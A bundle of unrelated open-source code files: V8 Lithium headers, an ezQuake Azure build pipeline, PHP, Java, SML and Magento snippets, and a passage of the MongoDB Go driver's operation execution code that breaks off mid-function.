  // Only used to declare the static cache; entries are set up by SetupCache().
  LStackSlot() : LOperand() { }

  explicit LStackSlot(int index) : LOperand(STACK_SLOT, index) { }
};
class LDoubleStackSlot: public LOperand {
public:
static LDoubleStackSlot* Create(int index) {
ASSERT(index >= 0);
if (index < kNumCachedOperands) return &cache[index];
return new LDoubleStackSlot(index);
}
static LDoubleStackSlot* cast(LOperand* op) {
ASSERT(op->IsStackSlot());
return reinterpret_cast<LDoubleStackSlot*>(op);
}
static void SetupCache();
private:
static const int kNumCachedOperands = 128;
static LDoubleStackSlot cache[];
LDoubleStackSlot() : LOperand() { }
explicit LDoubleStackSlot(int index) : LOperand(DOUBLE_STACK_SLOT, index) { }
};
// Operand naming general-purpose register `index`.  Small indices are served
// from a static cache (filled by SetupCache()) to avoid allocation.
class LRegister: public LOperand {
 public:
  static LRegister* Create(int index) {
    ASSERT(index >= 0);
    if (index < kNumCachedOperands) return &cache[index];
    return new LRegister(index);
  }

  static LRegister* cast(LOperand* op) {
    ASSERT(op->IsRegister());
    return reinterpret_cast<LRegister*>(op);
  }

  static void SetupCache();

 private:
  static const int kNumCachedOperands = 16;
  static LRegister cache[];

  // Only used to declare the static cache; entries are set up by SetupCache().
  LRegister() : LOperand() { }

  explicit LRegister(int index) : LOperand(REGISTER, index) { }
};
// Operand naming floating-point register `index`.  Small indices are served
// from a static cache (filled by SetupCache()) to avoid allocation.
class LDoubleRegister: public LOperand {
 public:
  static LDoubleRegister* Create(int index) {
    ASSERT(index >= 0);
    if (index < kNumCachedOperands) return &cache[index];
    return new LDoubleRegister(index);
  }

  static LDoubleRegister* cast(LOperand* op) {
    ASSERT(op->IsDoubleRegister());
    return reinterpret_cast<LDoubleRegister*>(op);
  }

  static void SetupCache();

 private:
  static const int kNumCachedOperands = 16;
  static LDoubleRegister cache[];

  // Only used to declare the static cache; entries are set up by SetupCache().
  LDoubleRegister() : LOperand() { }

  explicit LDoubleRegister(int index) : LOperand(DOUBLE_REGISTER, index) { }
};
// An ordered collection of LMoveOperands to be performed as one parallel
// move (e.g. at a gap position between instructions).
class LParallelMove : public ZoneObject {
 public:
  LParallelMove() : move_operands_(4) { }

  void AddMove(LOperand* from, LOperand* to) {
    move_operands_.Add(LMoveOperands(from, to));
  }

  // True when every contained move is redundant (defined elsewhere).
  bool IsRedundant() const;

  const ZoneList<LMoveOperands>* move_operands() const {
    return &move_operands_;
  }

  void PrintDataTo(StringStream* stream) const;

 private:
  ZoneList<LMoveOperands> move_operands_;
};
// Records which operands hold GC-traceable pointers at a given position.
class LPointerMap: public ZoneObject {
 public:
  explicit LPointerMap(int position)
      : pointer_operands_(8), position_(position), lithium_position_(-1) { }

  const ZoneList<LOperand*>* operands() const { return &pointer_operands_; }
  int position() const { return position_; }
  int lithium_position() const { return lithium_position_; }

  // Write-once: the ASSERT guards against setting the position twice
  // (-1 means "not yet assigned").
  void set_lithium_position(int pos) {
    ASSERT(lithium_position_ == -1);
    lithium_position_ = pos;
  }

  void RecordPointer(LOperand* op);
  void PrintTo(StringStream* stream);

 private:
  ZoneList<LOperand*> pointer_operands_;
  int position_;
  int lithium_position_;
};
// Captures the state needed at a potential deoptimization point: the
// closure, the values live in the frame, and (once Register() has been
// called) the indices under which this environment was recorded.
// Environments nest via outer_ for inlined frames.
class LEnvironment: public ZoneObject {
 public:
  LEnvironment(Handle<JSFunction> closure,
               int ast_id,
               int parameter_count,
               int argument_count,
               int value_count,
               LEnvironment* outer)
      : closure_(closure),
        arguments_stack_height_(argument_count),
        deoptimization_index_(Safepoint::kNoDeoptimizationIndex),
        translation_index_(-1),
        ast_id_(ast_id),
        parameter_count_(parameter_count),
        values_(value_count),
        representations_(value_count),
        spilled_registers_(NULL),
        spilled_double_registers_(NULL),
        outer_(outer) {
  }

  Handle<JSFunction> closure() const { return closure_; }
  int arguments_stack_height() const { return arguments_stack_height_; }
  int deoptimization_index() const { return deoptimization_index_; }
  int translation_index() const { return translation_index_; }
  int ast_id() const { return ast_id_; }
  int parameter_count() const { return parameter_count_; }
  LOperand** spilled_registers() const { return spilled_registers_; }
  LOperand** spilled_double_registers() const {
    return spilled_double_registers_;
  }
  const ZoneList<LOperand*>* values() const { return &values_; }
  LEnvironment* outer() const { return outer_; }

  // values_ and representations_ grow in lockstep; HasTaggedValueAt
  // indexes the parallel representations_ list.
  void AddValue(LOperand* operand, Representation representation) {
    values_.Add(operand);
    representations_.Add(representation);
  }

  bool HasTaggedValueAt(int index) const {
    return representations_[index].IsTagged();
  }

  // Records the deoptimization/translation indices.  May only be called
  // once per environment (see HasBeenRegistered).
  void Register(int deoptimization_index, int translation_index) {
    ASSERT(!HasBeenRegistered());
    deoptimization_index_ = deoptimization_index;
    translation_index_ = translation_index;
  }
  bool HasBeenRegistered() const {
    return deoptimization_index_ != Safepoint::kNoDeoptimizationIndex;
  }

  void SetSpilledRegisters(LOperand** registers,
                           LOperand** double_registers) {
    spilled_registers_ = registers;
    spilled_double_registers_ = double_registers;
  }

  void PrintTo(StringStream* stream);

 private:
  Handle<JSFunction> closure_;
  int arguments_stack_height_;
  int deoptimization_index_;
  int translation_index_;
  int ast_id_;
  int parameter_count_;
  ZoneList<LOperand*> values_;
  ZoneList<Representation> representations_;

  // Allocation index indexed arrays of spill slot operands for registers
  // that are also in spill slots at an OSR entry. NULL for environments
  // that do not correspond to an OSR entry.
  LOperand** spilled_registers_;
  LOperand** spilled_double_registers_;

  LEnvironment* outer_;

  friend class LCodegen;
};
// Iterates over the non-null, non-constant operands in an environment
// (outer environments are not visited; see DeepIterator for that).
class ShallowIterator BASE_EMBEDDED {
 public:
  // A NULL environment yields an immediately-exhausted iterator.
  explicit ShallowIterator(LEnvironment* env)
      : env_(env),
        limit_(env != NULL ? env->values()->length() : 0),
        current_(0) {
    current_ = AdvanceToNext(0);
  }

  inline bool HasNext() {
    return env_ != NULL && current_ < limit_;
  }

  inline LOperand* Next() {
    ASSERT(HasNext());
    return env_->values()->at(current_);
  }

  inline void Advance() {
    current_ = AdvanceToNext(current_ + 1);
  }

  inline LEnvironment* env() { return env_; }

 private:
  // Operands excluded from iteration: holes, constants and arguments.
  inline bool ShouldSkip(LOperand* op) {
    return op == NULL || op->IsConstantOperand() || op->IsArgument();
  }

  // First index >= start whose operand is not skipped, or limit_.
  inline int AdvanceToNext(int start) {
    while (start < limit_ && ShouldSkip(env_->values()->at(start))) {
      start++;
    }
    return start;
  }

  LEnvironment* env_;
  int limit_;
  int current_;
};
// Iterator for non-null, non-constant operands incl. outer environments:
// walks a ShallowIterator over each environment in the outer_ chain.
class DeepIterator BASE_EMBEDDED {
 public:
  explicit DeepIterator(LEnvironment* env)
      : current_iterator_(env) { }

  // NOTE: not a pure query -- when the current environment is exhausted
  // this advances current_iterator_ to the outer environment.
  inline bool HasNext() {
    if (current_iterator_.HasNext()) return true;
    if (current_iterator_.env() == NULL) return false;
    AdvanceToOuter();
    return current_iterator_.HasNext();
  }

  inline LOperand* Next() {
    ASSERT(current_iterator_.HasNext());
    return current_iterator_.Next();
  }

  inline void Advance() {
    if (current_iterator_.HasNext()) {
      current_iterator_.Advance();
    } else {
      AdvanceToOuter();
    }
  }

 private:
  // Precondition: current_iterator_.env() != NULL (callers check HasNext
  // first); env()->outer() may be NULL, which ShallowIterator tolerates.
  inline void AdvanceToOuter() {
    current_iterator_ = ShallowIterator(current_iterator_.env()->outer());
  }

  ShallowIterator current_iterator_;
};
} } // namespace v8::internal
#endif // V8_LITHIUM_H_
| {
"pile_set_name": "Github"
} |
# C/C++ with GCC
# Build your C/C++ project with GCC using make.
# Add steps that publish test results, save build artifacts, deploy, and more:
# https://docs.microsoft.com/azure/devops/pipelines/apps/c-cpp/gcc

# at pipeline level, set 'ezquake.githubconnection' & 'ezquake.githubreponame' variables

# Build matrix: the Linux agent also cross-compiles the win32 binary with
# mingw-w64; a native Windows job exists but is commented out.
strategy:
  matrix:
    linux:
      imageName: 'ubuntu-latest'
    mac:
      imageName: 'macos-latest'
    #windows:
    #  imageName: 'windows-latest'

trigger:
- master

pool:
  vmImage: $(imageName)

steps:
# Linux: native linux64 build, then a mingw cross build for win32.
- script: |
    sudo apt-get -y update
    sudo apt install git build-essential mingw-w64 libsdl2-2.0-0 libsdl2-dev libjansson-dev libexpat1-dev libcurl4-openssl-dev libpng-dev libjpeg-dev libspeex-dev libspeexdsp-dev
    make && make strip
    tar -cvzf ezquake-latest-linux64.zip ezquake-*-* LICENSE
    make clean
    EZ_CONFIG_FILE=.config_windows make
    EZ_CONFIG_FILE=.config_windows make strip
    zip ezquake-latest-win32.zip ezquake.exe LICENSE release-notes.md
  displayName: 'make (linux/win32)'
  condition: eq( variables['Agent.OS'], 'Linux' )

# macOS: native build packaged into an app bundle.
- script: |
    brew update
    brew install pkgconfig pcre sdl2 sdl2_net sdl2_image sdl2_gfx sdl2_mixer jansson speex speexdsp
    make && make strip
    sh ./misc/install/create_osx_bundle.sh
    mv ezquake.zip ezquake-latest-osx.zip
  displayName: 'make (osx)'
  condition: eq( variables['Agent.OS'], 'Darwin' )

# Stage the zips plus release notes, publish them, and refresh the rolling
# 'latest' prerelease on GitHub.
- task: CopyFiles@2
  inputs:
    contents: ezquake-latest-*.zip
    targetFolder: $(Build.ArtifactStagingDirectory)/distributableBinaries/
- task: CopyFiles@2
  inputs:
    contents: release-notes.md
    targetFolder: $(Build.ArtifactStagingDirectory)/distributableBinaries/
- task: PublishBuildArtifacts@1
  inputs:
    pathtoPublish: '$(Build.ArtifactStagingDirectory)/distributableBinaries/'
    artifactName: 'latest-build'
- task: GitHubRelease@0
  displayName: 'Edit GitHub Release'
  inputs:
    gitHubConnection: '$(ezquake.githubconnection)'
    repositoryName: '$(ezquake.githubreponame)'
    action: edit
    tag: latest
    assets: $(Build.ArtifactStagingDirectory)/distributableBinaries/*
    isPreRelease: true
    assetUploadMode: replace
    addChangeLog: false
    releaseNotesFile: 'release-notes.md'
| {
"pile_set_name": "Github"
} |
<?php
// Allow the bootstrap mode to be supplied as the first CLI argument.
if (isset($argv[1])) {
    $_GET['mode'] = $argv[1];
}

// mode=yaf selects the bootstrap that loads the yaf .so extension;
// anything else falls back to the default bootstrap.
$useYafExtension = isset($_GET['mode']) && $_GET['mode'] == 'yaf';
include($useYafExtension ? 'bootstrap_yaf_so.php' : 'bootstrap.php');

// Render the outer template, handing it the inner template's path.
$viewsPath = TEST_APPLICATION_PATH . 'application/views/';
$view = new Yaf_View_Simple($viewsPath);
$view->render('test/testCase039.phtml', array('tpl' => 'test/testCase038.phtml'));
?>
"pile_set_name": "Github"
} |
/* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.app.merge;
import java.awt.BorderLayout;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.*;
import docking.widgets.label.GDLabel;
import docking.widgets.label.GIconLabel;
import resources.ResourceManager;
/**
 * The PhaseProgressPanel provides a title, progress bar and message for the current phase that is
 * in progress.
 * <p>
 * {@link #setMessage(String)} and {@link #setProgress(int)} only buffer the latest values;
 * a 250 ms Swing {@link Timer} applies them on the event dispatch thread, coalescing bursts
 * of updates and stopping itself once a tick finds nothing changed.
 */
public class PhaseProgressPanel extends JPanel {

	private final static String DEFAULT_INFO = "Merge programs in progress...";
	private ImageIcon INFORM_ICON = ResourceManager.loadImage("images/information.png");

	private JLabel titleLabel;
	private JProgressBar progressBar;
	private JPanel progressMessagePanel;
	private JLabel messageIcon;
	private JLabel messageLabel;
	private boolean isShowingProgress = false; // true while progressBar is in the component tree
	private boolean isShowingMessage = false; // true while the message row is in the component tree
	private String title;
	private SpringLayout progressLayout;
	private Timer updateTimer; // coalesces GUI updates; fires on the EDT
	private boolean isTimerRunning;
	private String message; // pending message; null once applied by update()
	private int progress; // pending progress percentage
	private int lastProgress = -1; // last percentage shown; -1 forces the first update

	/**
	 * Constructs the panel with the given title line.
	 * @param title the title displayed above the progress bar
	 */
	public PhaseProgressPanel(String title) {
		this.title = title;
		progressLayout = new SpringLayout();
		setLayout(progressLayout);
		createProgressPanel();
		adjustPreferredSize();
	}

	/**
	 * Determines and sets the preferred size of this panel, accounting for
	 * whichever of the progress bar and message row are currently showing.
	 */
	private void adjustPreferredSize() {
		int width = titleLabel.getPreferredSize().width + 5;
		int height = titleLabel.getPreferredSize().height + 5;
		if (isShowingProgress) {
			height += 5;
			height += progressBar.getPreferredSize().height;
			width = Math.max(width, progressBar.getPreferredSize().width);
		}
		if (isShowingMessage) {
			height += 5;
			height += progressMessagePanel.getPreferredSize().height;
			width = Math.max(width, progressMessagePanel.getPreferredSize().width);
		}
		setPreferredSize(new Dimension(width, height));
	}

	// Builds the title label, progress bar and message row, and the timer
	// that later applies buffered updates.
	private void createProgressPanel() {
		titleLabel = new GDLabel(title);
		add(titleLabel);
		progressLayout.putConstraint(SpringLayout.WEST, titleLabel, 5, SpringLayout.WEST, this);
		progressLayout.putConstraint(SpringLayout.NORTH, titleLabel, 5, SpringLayout.NORTH, this);

		progressBar = new JProgressBar(SwingConstants.HORIZONTAL);
		Dimension dim = progressBar.getPreferredSize();
		progressBar.setPreferredSize(new Dimension(500, (int) dim.getHeight()));
		progressBar.setMaximum(100);
		progressLayout.putConstraint(SpringLayout.NORTH, progressBar, 5, SpringLayout.SOUTH,
			titleLabel);
		progressLayout.putConstraint(SpringLayout.WEST, progressBar, 0, SpringLayout.WEST,
			titleLabel);
		doSetProgress(0);

		progressMessagePanel = new JPanel(new BorderLayout());
		messageIcon = new GIconLabel(INFORM_ICON);
		messageIcon.setBorder(BorderFactory.createEmptyBorder(0, 0, 0, 5));
		messageLabel = new GDLabel(DEFAULT_INFO);
		progressMessagePanel.add(messageIcon, BorderLayout.WEST);
		progressMessagePanel.add(messageLabel, BorderLayout.CENTER);
		doSetMessage(DEFAULT_INFO);

		// Sets up the timer for updating the GUI.
		updateTimer = new Timer(250, new ActionListener() {
			@Override
			public void actionPerformed(ActionEvent e) {
				update();
			}
		});
	}

	// Called on each timer tick (EDT): applies any buffered message and/or
	// progress values, and stops the timer once a tick makes no changes.
	// Synchronized against the producer-side setMessage/setProgress.
	private synchronized void update() {
		boolean changed = false;
		if (message != null) {
			doSetMessage(message);
			message = null;
			changed = true;
		}
		if (progress != lastProgress) {
			doSetProgress(progress);
			lastProgress = progress;
			changed = true;
		}
		if (!changed) {
			updateTimer.stop();
			isTimerRunning = false;
		}
	}

	/**
	 * Method to get the panel to update with changes when already on the screen.
	 */
	private void doValidate() {
		invalidate();
		repaint();
		adjustPreferredSize();
	}

	/**
	 * Sets the title line displayed by this panel.
	 * @param newTitle the new title string
	 */
	public void setTitle(String newTitle) {
		titleLabel.setText(newTitle);
		doValidate();
	}

	/**
	 * Immediately sets the message label text, lazily re-adding the message
	 * row (below the progress bar if showing, otherwise below the title)
	 * the first time it is needed.
	 * @param newMessage the new message text to be displayed.
	 */
	private void doSetMessage(String newMessage) {
		messageLabel.setText(newMessage);
		if (!isShowingMessage) {
			add(progressMessagePanel);
			progressLayout.putConstraint(SpringLayout.WEST, progressMessagePanel, 0,
				SpringLayout.WEST, titleLabel);
			progressLayout.putConstraint(SpringLayout.NORTH, progressMessagePanel, 5,
				SpringLayout.SOUTH, (isShowingProgress ? progressBar : titleLabel));
			isShowingMessage = true;
		}
		doValidate();
	}

	/**
	 * Buffers a new progress message; the update timer applies it on the
	 * event dispatch thread.  Safe to call from any thread.
	 * @param message the new message text to be displayed.
	 */
	public synchronized void setMessage(String message) {
		this.message = message;
		if (!isTimerRunning) {
			updateTimer.start();
			isTimerRunning = true;
		}
	}

	/**
	 * Immediately fills in the progress bar to the indicated percent,
	 * lazily re-adding the bar if it had been removed.
	 * @param progressPercentage total percent of the progress bar that should be filled in.
	 */
	private void doSetProgress(final int progressPercentage) {
		if (progressPercentage < 0 || progressPercentage > 100) {
			throw new RuntimeException(
				"Invalid progress value (" + progressPercentage + "). Must be from 0 to 100.");
		}
		if (!isShowingProgress) {
			add(progressBar);
			isShowingProgress = true;
		}
		progressBar.setValue(progressPercentage);
		doValidate();
	}

	/**
	 * Buffers a new progress percentage; the update timer applies it on the
	 * event dispatch thread.  Safe to call from any thread.
	 * @param progressPercentage total percent of the progress bar that should be filled in.
	 */
	public synchronized void setProgress(int progressPercentage) {
		progress = progressPercentage;
		if (!isTimerRunning) {
			updateTimer.start();
			isTimerRunning = true;
		}
	}

	/**
	 * Removes the message from being displayed by this panel.
	 * Setting the message text will cause it to get added again.
	 */
	public void removeMessage() {
		remove(progressMessagePanel);
		isShowingMessage = false;
		doValidate();
	}

	/**
	 * Removes the progress bar from being displayed by this panel.
	 * Setting progress will cause it to get added again.
	 */
	public void removeProgress() {
		remove(progressBar);
		if (isShowingMessage) {
			progressLayout.putConstraint(SpringLayout.NORTH, messageIcon, 5, SpringLayout.SOUTH,
				titleLabel);
		}
		isShowingProgress = false;
		doValidate();
	}
}
| {
"pile_set_name": "Github"
} |
(* Copyright (C) 2002-2006 Henry Cejtin, Matthew Fluet, Suresh
* Jagannathan, and Stephen Weeks.
*
* MLton is released under a HPND-style license.
* See the file MLton-LICENSE for details.
*)
(* Adapts a Basis IO structure to the older IO_1997 signature by
 * re-exporting its contents unchanged. *)
functor IOConvert
   (structure IO: IO) :
   IO_1997 =
   struct
      open IO

      (* Declared only to satisfy IO_1997; nothing here raises it. *)
      exception TerminatedStream
   end
| {
"pile_set_name": "Github"
} |
<?php
/*********************************************************************************
* This file is part of Sentrifugo.
* Copyright (C) 2014 Sapplica
*
* Sentrifugo is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Sentrifugo is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Sentrifugo. If not, see <http://www.gnu.org/licenses/>.
*
* Sentrifugo Support <[email protected]>
********************************************************************************/
/**
 * Table-gateway model for the `expense_forward` table, which tracks
 * expense reports forwarded for approval.
 *
 * @model Forward Expenses Model
 * @author sagarsoft
 */
class Expenses_Model_Forwardexpenses extends Zend_Db_Table_Abstract
{
    protected $_name = 'expense_forward';
    protected $_primary = 'id';

    /**
     * Saves a new forwarded-expense row or updates an existing one.
     *
     * @param array  $data  Column => value pairs to write.
     * @param string $where Update criteria; pass '' to insert instead.
     * @return string|int The literal string 'update' when an update was
     *     performed, otherwise the auto-increment id of the inserted row.
     *     NOTE(review): callers must handle both return types.
     */
    public function saveOrUpdateForwardData($data, $where){
        if($where != ''){
            $this->update($data, $where);
            return 'update';
        } else {
            $this->insert($data);
            $id=$this->getAdapter()->lastInsertId($this->_name);
            return $id;
        }
    }
}
"pile_set_name": "Github"
} |
<?php
/**
* Interface for output class of standard profiler driver.
*
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Framework\Profiler\Driver\Standard;
/**
 * Renders the statistics collected by the standard profiler driver.
 *
 * Interface \Magento\Framework\Profiler\Driver\Standard\OutputInterface
 */
interface OutputInterface
{
    /**
     * Display profiling results in appropriate format
     *
     * @param Stat $stat Accumulated profiler timing statistics to render.
     * @return void
     */
    public function display(Stat $stat);
}
| {
"pile_set_name": "Github"
} |
package driver
import (
"bytes"
"context"
"errors"
"fmt"
"strconv"
"strings"
"time"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/bsontype"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/event"
"go.mongodb.org/mongo-driver/mongo/readconcern"
"go.mongodb.org/mongo-driver/mongo/readpref"
"go.mongodb.org/mongo-driver/mongo/writeconcern"
"go.mongodb.org/mongo-driver/x/bsonx/bsoncore"
"go.mongodb.org/mongo-driver/x/mongo/driver/description"
"go.mongodb.org/mongo-driver/x/mongo/driver/session"
"go.mongodb.org/mongo-driver/x/mongo/driver/wiremessage"
)
// defaultLocalThreshold is the default latency window used when building the
// default server selector in selectServer.
const defaultLocalThreshold = 15 * time.Millisecond

// dollarCmd is the collection-name suffix (".$cmd") appended to the database
// name when building the full collection name for legacy OP_QUERY commands.
var dollarCmd = [...]byte{'.', '$', 'c', 'm', 'd'}

var (
	// ErrNoDocCommandResponse occurs when the server indicated a response existed, but none was found.
	ErrNoDocCommandResponse = errors.New("command returned no documents")
	// ErrMultiDocCommandResponse occurs when the server sent multiple documents in response to a command.
	ErrMultiDocCommandResponse = errors.New("command returned multiple documents")
	// ErrReplyDocumentMismatch occurs when the number of documents returned in an OP_QUERY does not match the numberReturned field.
	ErrReplyDocumentMismatch = errors.New("number of documents returned does not match numberReturned field")
	// ErrNonPrimaryReadPref is returned when a read is attempted in a transaction with a non-primary read preference.
	ErrNonPrimaryReadPref = errors.New("read preference in a transaction must be primary")
)

const (
	// maximum BSON object size when client side encryption is enabled
	cryptMaxBsonObjectSize uint32 = 2097152
	// minimum wire version necessary to use automatic encryption
	cryptMinWireVersion int32 = 8
)
// InvalidOperationError is returned from Validate and indicates that a required field is missing
// from an instance of Operation.
type InvalidOperationError struct{ MissingField string }

// Error implements the error interface, naming the missing required field.
func (e InvalidOperationError) Error() string {
	return fmt.Sprintf("the %s field must be set on Operation", e.MissingField)
}
// opReply stores information returned in an OP_REPLY response from the server.
// The err field stores any error that occurred when decoding or validating the OP_REPLY response.
type opReply struct {
	responseFlags wiremessage.ReplyFlag // response flags reported by the server
	cursorID      int64                 // cursor ID echoed by the server
	startingFrom  int32                 // starting offset reported by the server
	numReturned   int32                 // number of documents the server claims to have returned
	documents     []bsoncore.Document   // raw BSON documents parsed from the reply
	err           error                 // decode/validation error, if any
}
// startedInformation keeps track of all of the information necessary for monitoring started events.
type startedInformation struct {
	cmd                      bsoncore.Document // command document reported to the command monitor
	requestID                int32             // wire-message request ID
	cmdName                  string            // name of the command being run
	documentSequenceIncluded bool              // true when a type-1 document sequence was appended to the OP_MSG
	connID                   string            // ID of the connection the command was written to
	redacted                 bool              // true when the command must be hidden from monitors
}
// finishedInformation keeps track of all of the information necessary for monitoring success and failure events.
type finishedInformation struct {
	cmdName   string            // name of the command that was run
	requestID int32             // wire-message request ID
	response  bsoncore.Document // raw server response document
	cmdErr    error             // error returned by the round trip, if any
	connID    string            // ID of the connection the command was written to
	startTime time.Time         // time the command was sent, used to compute duration
	redacted  bool              // true when the response must be hidden from monitors
}
// Operation is used to execute an operation. It contains all of the common code required to
// select a server, transform an operation into a command, write the command to a connection from
// the selected server, read a response from that connection, process the response, and potentially
// retry.
//
// The required fields are Database, CommandFn, and Deployment. All other fields are optional.
//
// While an Operation can be constructed manually, drivergen should be used to generate an
// implementation of an operation instead. This will ensure that there are helpers for constructing
// the operation and that this type isn't configured incorrectly.
type Operation struct {
	// CommandFn is used to create the command that will be wrapped in a wire message and sent to
	// the server. This function should only add the elements of the command and not start or end
	// the enclosing BSON document. Per the command API, the first element must be the name of the
	// command to run. This field is required.
	CommandFn func(dst []byte, desc description.SelectedServer) ([]byte, error)

	// Database is the database that the command will be run against. This field is required.
	Database string

	// Deployment is the MongoDB Deployment to use. While most of the time this will be multiple
	// servers, commands that need to run against a single, preselected server can use the
	// SingleServerDeployment type. Commands that need to run on a preselected connection can use
	// the SingleConnectionDeployment type.
	Deployment Deployment

	// ProcessResponseFn is called after a response to the command is returned. The server is
	// provided for types like Cursor that are required to run subsequent commands using the same
	// server.
	ProcessResponseFn func(response bsoncore.Document, srvr Server, desc description.Server) error

	// Selector is the server selector that's used during both initial server selection and
	// subsequent selection for retries. Depending on the Deployment implementation, the
	// SelectServer method may not actually be called.
	Selector description.ServerSelector

	// ReadPreference is the read preference that will be attached to the command. If this field is
	// not specified a default read preference of primary will be used.
	ReadPreference *readpref.ReadPref

	// ReadConcern is the read concern used when running read commands. This field should not be set
	// for write operations. If this field is set, it will be encoded onto the commands sent to the
	// server.
	ReadConcern *readconcern.ReadConcern

	// MinimumReadConcernWireVersion specifies the minimum wire version to add the read concern to
	// the command being executed.
	MinimumReadConcernWireVersion int32

	// WriteConcern is the write concern used when running write commands. This field should not be
	// set for read operations. If this field is set, it will be encoded onto the commands sent to
	// the server.
	WriteConcern *writeconcern.WriteConcern

	// MinimumWriteConcernWireVersion specifies the minimum wire version to add the write concern to
	// the command being executed.
	MinimumWriteConcernWireVersion int32

	// Client is the session used with this operation. This can be either an implicit or explicit
	// session. If the server selected does not support sessions and Client is specified the
	// behavior depends on the session type. If the session is implicit, the session fields will not
	// be encoded onto the command. If the session is explicit, an error will be returned. The
	// caller is responsible for ensuring that this field is nil if the Deployment does not support
	// sessions.
	Client *session.Client

	// Clock is a cluster clock, different from the one contained within a session.Client. This
	// allows updating cluster times for a global cluster clock while allowing individual session's
	// cluster clocks to be only updated as far as the last command that's been run.
	Clock *session.ClusterClock

	// RetryMode specifies how to retry. There are three modes that enable retry: RetryOnce,
	// RetryOncePerCommand, and RetryContext. For more information about what these modes do, please
	// refer to their definitions. Both RetryMode and Type must be set for retryability to be enabled.
	RetryMode *RetryMode

	// Type specifies the kind of operation this is. There is only one mode that enables retry: Write.
	// For more information about what this mode does, please refer to its definition. Both Type and
	// RetryMode must be set for retryability to be enabled.
	Type Type

	// Batches contains the documents that are split when executing a write command that potentially
	// has more documents than can fit in a single command. This should only be specified for
	// commands that are batch compatible. For more information, please refer to the definition of
	// Batches.
	Batches *Batches

	// Legacy sets the legacy type for this operation. There are only 3 types that require legacy
	// support: find, getMore, and killCursors. For more information about LegacyOperationKind,
	// please refer to its definition.
	Legacy LegacyOperationKind

	// CommandMonitor specifies the monitor to use for APM events. If this field is not set,
	// no events will be reported.
	CommandMonitor *event.CommandMonitor

	// Crypt specifies a Crypt object to use for automatic client side encryption and decryption.
	Crypt *Crypt
}
// shouldEncrypt returns true if this operation should automatically be encrypted.
func (op Operation) shouldEncrypt() bool {
	if op.Crypt == nil {
		return false
	}
	return !op.Crypt.BypassAutoEncryption
}
// selectServer handles performing server selection for an operation.
func (op Operation) selectServer(ctx context.Context) (Server, error) {
	if err := op.Validate(); err != nil {
		return nil, err
	}

	sel := op.Selector
	if sel == nil {
		// No caller-supplied selector: build the default one from the read
		// preference (primary if unset) combined with the latency window.
		pref := op.ReadPreference
		if pref == nil {
			pref = readpref.Primary()
		}
		sel = description.CompositeSelector([]description.ServerSelector{
			description.ReadPrefSelector(pref),
			description.LatencySelector(defaultLocalThreshold),
		})
	}

	return op.Deployment.SelectServer(ctx, sel)
}
// Validate validates this operation, ensuring the fields are set properly.
// Checks are performed in order; the first failure is reported.
func (op Operation) Validate() error {
	switch {
	case op.CommandFn == nil:
		return InvalidOperationError{MissingField: "CommandFn"}
	case op.Deployment == nil:
		return InvalidOperationError{MissingField: "Deployment"}
	case op.Database == "":
		return InvalidOperationError{MissingField: "Database"}
	case op.Client != nil && !writeconcern.AckWrite(op.WriteConcern):
		return errors.New("session provided for an unacknowledged write")
	}
	return nil
}
// Execute runs this operation. The scratch parameter will be used and overwritten (potentially many
// times), this should mainly be used to enable pooling of byte slices.
func (op Operation) Execute(ctx context.Context, scratch []byte) error {
	err := op.Validate()
	if err != nil {
		return err
	}

	srvr, err := op.selectServer(ctx)
	if err != nil {
		return err
	}

	conn, err := srvr.Connection(ctx)
	if err != nil {
		return err
	}
	defer conn.Close()

	desc := description.SelectedServer{Server: conn.Description(), Kind: op.Deployment.Kind()}
	scratch = scratch[:0]
	// Servers below wire version 4 are handled by the legacy OP_QUERY-based
	// implementations for find/getMore/killCursors.
	if desc.WireVersion == nil || desc.WireVersion.Max < 4 {
		switch op.Legacy {
		case LegacyFind:
			return op.legacyFind(ctx, scratch, srvr, conn, desc)
		case LegacyGetMore:
			return op.legacyGetMore(ctx, scratch, srvr, conn, desc)
		case LegacyKillCursors:
			return op.legacyKillCursors(ctx, scratch, srvr, conn, desc)
		}
	}
	// Servers below wire version 3 are handled by the legacy implementations
	// for listCollections/listIndexes.
	if desc.WireVersion == nil || desc.WireVersion.Max < 3 {
		switch op.Legacy {
		case LegacyListCollections:
			return op.legacyListCollections(ctx, scratch, srvr, conn, desc)
		case LegacyListIndexes:
			return op.legacyListIndexes(ctx, scratch, srvr, conn, desc)
		}
	}

	var res bsoncore.Document
	var operationErr WriteCommandError
	var original error
	var retries int

	// Work out how many retries are permitted: 1 for the "once" modes,
	// -1 (unbounded, context-limited) for RetryContext.
	retryable := op.retryable(desc.Server)
	if retryable && op.RetryMode != nil {
		switch op.Type {
		case Write:
			if op.Client == nil {
				break
			}
			switch *op.RetryMode {
			case RetryOnce, RetryOncePerCommand:
				retries = 1
			case RetryContext:
				retries = -1
			}

			op.Client.RetryWrite = false
			if *op.RetryMode > RetryNone {
				op.Client.RetryWrite = true
				if !op.Client.Committing && !op.Client.Aborting {
					op.Client.IncrementTxnNumber()
				}
			}
		case Read:
			switch *op.RetryMode {
			case RetryOnce, RetryOncePerCommand:
				retries = 1
			case RetryContext:
				retries = -1
			}
		}
	}

	batching := op.Batches.Valid()
	retryEnabled := op.RetryMode != nil && op.RetryMode.Enabled()
	currIndex := 0
	// Main command loop: one iteration per batch (or per retry attempt).
	for {
		if batching {
			targetBatchSize := desc.MaxDocumentSize
			maxDocSize := desc.MaxDocumentSize
			if op.shouldEncrypt() {
